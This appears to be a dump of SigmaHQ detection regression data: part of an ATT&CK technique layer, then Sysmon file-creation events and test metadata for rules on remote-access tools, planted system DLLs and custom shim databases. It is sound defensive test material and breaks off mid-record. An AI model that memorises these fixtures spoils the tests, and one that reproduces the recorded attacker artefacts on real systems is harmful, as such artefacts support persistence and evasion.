"showSubtechniques": false
},
{
"techniqueID": "T1039",
"tactic": "collection",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1570",
"tactic": "lateral-movement",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1216.001",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036.004",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1110.001",
"tactic": "credential-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036.002",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1110.002",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1222.001",
"tactic": "defense-evasion",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1217",
"tactic": "discovery",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1622",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1622",
"tactic": "discovery",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.004",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.004",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1059.006",
"tactic": "execution",
"score": 8,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036.007",
"tactic": "defense-evasion",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1620",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1069",
"tactic": "discovery",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070.005",
"tactic": "defense-evasion",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1037.001",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1037.001",
"tactic": "privilege-escalation",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1135",
"tactic": "discovery",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1185",
"tactic": "collection",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1505.004",
"tactic": "persistence",
"score": 5,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1003.006",
"tactic": "credential-access",
"score": 7,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1006",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.013",
"tactic": "privilege-escalation",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.013",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1137",
"tactic": "persistence",
"score": 9,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1008",
"tactic": "command-and-control",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1137.006",
"tactic": "persistence",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1136.002",
"tactic": "persistence",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.009",
"tactic": "persistence",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.009",
"tactic": "privilege-escalation",
"score": 4,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1137.003",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1195",
"tactic": "initial-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.015",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.015",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1001.003",
"tactic": "command-and-control",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1114.001",
"tactic": "collection",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1222",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1589.002",
"tactic": "reconnaissance",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.012",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.012",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1574.012",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.010",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.010",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1125",
"tactic": "collection",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.009",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.009",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.008",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.008",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.005",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.005",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1553.003",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.003",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1547.003",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.012",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1546.012",
"tactic": "persistence",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1559.002",
"tactic": "execution",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550.002",
"tactic": "defense-evasion",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1550.002",
"tactic": "lateral-movement",
"score": 6,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1553.002",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1207",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1010",
"tactic": "discovery",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.005",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1134.005",
"tactic": "privilege-escalation",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1200",
"tactic": "initial-access",
"score": 3,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1557.003",
"tactic": "credential-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1557.003",
"tactic": "collection",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1091",
"tactic": "lateral-movement",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1091",
"tactic": "initial-access",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1590.002",
"tactic": "reconnaissance",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1499.001",
"tactic": "impact",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1176",
"tactic": "persistence",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1595.001",
"tactic": "reconnaissance",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548.003",
"tactic": "privilege-escalation",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1548.003",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1559",
"tactic": "execution",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1564.008",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1090.004",
"tactic": "command-and-control",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1598.002",
"tactic": "reconnaissance",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1036.008",
"tactic": "defense-evasion",
"score": 1,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
},
{
"techniqueID": "T1070.008",
"tactic": "defense-evasion",
"score": 2,
"color": "",
"comment": "",
"enabled": true,
"metadata": [],
"links": [],
"showSubtechniques": false
}
]
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:36:29.111126Z"
}
},
"EventRecordID": 18267,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:36:29.110",
"ProcessGuid": "5AA13A44-0D74-68FC-EB1D-000000004002",
"ProcessId": 5624,
"Image": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\is-3C3LU.tmp\\Advanced_IP_Scanner_2.5.4594.1(1).tmp",
"TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Advanced IP Scanner 2\\platforms\\qwindows.dll",
"CreationUtcTime": "2025-10-24 10:44:35.897",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml
================================================
id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: fed85bf9-e075-4280-9159-fbe8a023d6fa
title: Advanced IP Scanner - File Event
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:34:34.640670Z"
}
},
"EventRecordID": 14961,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:34:34.634",
"ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002",
"ProcessId": 7760,
"Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe",
"TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf.new",
"CreationUtcTime": "2025-10-24 23:34:32.457",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:34:34.644616Z"
}
},
"EventRecordID": 14963,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:34:34.634",
"ProcessGuid": "5AA13A44-0D08-68FC-DC1D-000000004002",
"ProcessId": 7760,
"Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe",
"TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\service.conf~RF2d9c1fe.TMP",
"CreationUtcTime": "2025-10-24 23:34:34.634",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:34:34.649129Z"
}
},
"EventRecordID": 14985,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:34:34.645",
"ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002",
"ProcessId": 9612,
"Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe",
"TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new",
"CreationUtcTime": "2025-10-24 23:34:32.250",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:34:34.653476Z"
}
},
"EventRecordID": 14988,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:34:34.645",
"ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002",
"ProcessId": 9612,
"Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe",
"TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf~RF2d9c20d.TMP",
"CreationUtcTime": "2025-10-24 23:34:34.645",
"User": "ATTACKRANGE\\Administrator"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:34:34.655191Z"
}
},
"EventRecordID": 14990,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:34:34.645",
"ProcessGuid": "5AA13A44-0D08-68FC-DD1D-000000004002",
"ProcessId": 9612,
"Image": "C:\\Users\\Administrator\\Desktop\\AnyDesk.exe",
"TargetFilename": "C:\\Users\\Administrator\\AppData\\Roaming\\AnyDesk\\user.conf.new",
"CreationUtcTime": "2025-10-24 23:34:32.250",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/info.yml
================================================
id: 0d7ff9a2-a55c-46c8-b878-4ec4ea8e91ae
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 0b9ad457-2554-44c1-82c2-d56a99c42377
title: Anydesk Temporary Artefact
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:36:53.996168Z"
}
},
"EventRecordID": 19025,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:36:53.977",
"ProcessGuid": "5AA13A44-523E-68FB-1700-000000004002",
"ProcessId": 1276,
"Image": "C:\\Windows\\System32\\svchost.exe",
"TargetFilename": "C:\\Users\\Administrator\\Documents\\fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx",
"CreationUtcTime": "2025-10-24 23:36:52.320",
"User": "NT AUTHORITY\\LOCAL SERVICE"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml
================================================
id: afb1a75a-79c0-451e-b2dc-cb14fdc0e7ef
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 65236ec7-ace0-4f0c-82fd-737b04fd4dcb
title: EVTX Created In Uncommon Location
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations/65236ec7-ace0-4f0c-82fd-737b04fd4dcb.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:38:31.938519Z"
}
},
"EventRecordID": 20972,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:38:31.936",
"ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ProcessId": 10048,
"Image": "C:\\Windows\\system32\\cmd.exe",
"TargetFilename": "C:\\Windows\\System32\\WLBSCTRL.dll",
"CreationUtcTime": "2025-10-24 23:38:31.936",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml
================================================
id: 8da08693-5638-4236-87b1-d04b4fcc5e84
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: df6ecb8b-7822-4f4b-b412-08f524b4576c
title: Creation Of Non-Existent System DLL
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/df6ecb8b-7822-4f4b-b412-08f524b4576c.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:39:53.705006Z"
}
},
"EventRecordID": 22566,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:39:53.699",
"ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002",
"ProcessId": 7680,
"Image": "C:\\Windows\\explorer.exe",
"TargetFilename": "C:\\Windows\\apppatch\\CustomSDB\\my_custom.sdb",
"CreationUtcTime": "2025-10-24 23:39:53.699",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml
================================================
id: 094a2fb2-b1fd-4943-9379-c25e7ddb7136
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: ee63c85c-6d51-4d12-ad09-04e25877a947
title: New Custom Shim Database Created
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/ee63c85c-6d51-4d12-ad09-04e25877a947.evtx
================================================
FILE: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/13c02350-4177-4e45-ac17-cf7ca628ff5e.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 11,
"Version": 2,
"Level": 4,
"Task": 11,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:41:00.601559Z"
}
},
"EventRecordID": 23503,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-24 23:41:00.589",
"ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002",
"ProcessId": 10048,
"Image": "C:\\Windows\\system32\\cmd.exe",
"TargetFilename": "C:\\tdh.dll",
